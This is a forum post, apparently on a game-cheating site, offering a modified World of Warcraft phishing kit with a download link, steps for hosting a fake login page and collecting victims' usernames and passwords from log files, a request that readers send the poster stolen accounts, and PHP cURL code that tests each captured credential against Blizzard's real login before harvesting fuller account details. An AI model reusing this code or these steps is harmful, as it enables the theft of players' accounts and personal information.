Hello MMowned, I had a request from someone to edit a WoW Phisher so that it actually checks for valid account information before writing it to a file and proceeding to collect more bullshit information.
The script uses cURL and libCURL and requires that your PHP installation has both of these.
NOTE: I did NOT code the original phisher. Also, after entering correct account info, it takes you to the second page which proceeds to ask you for the full account info.
Steps:
1. Find free webhosting with PHP and cURL
2. Upload all files in the zip file to a directory.
3. Send people to your fake login.
4. Check log1.html and log2.html for the usernames and passwords they enter.
Download:
http://www.mediafire.com/?mdjjmz0mdix
Enjoy!
Also, if any of you guys gets an extra account, feel free to PM it to me
EDIT: For all your PHP coders, heres the code to incoporate this into your phisher if you know what you are doing.
$ch2 = curl_init();
$useragent="Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3";
curl_setopt ($ch2, CURLOPT_URL, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
curl_setopt($ch2, CURLOPT_USERAGENT, $useragent);
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_POST, 1);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch2, CURLOPT_REFERER, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
curl_setopt($ch2, CURLOPT_POSTFIELDS, "accountName=" . $user . "&password=" . $pass);
$source2 = curl_exec($ch2);
curl_close($ch2);
if (strpos($source2, 'Account Login') !== false) {
//Account Login Failed
//Code Here!
} else {
//Account Login Success!
//Code Here!
}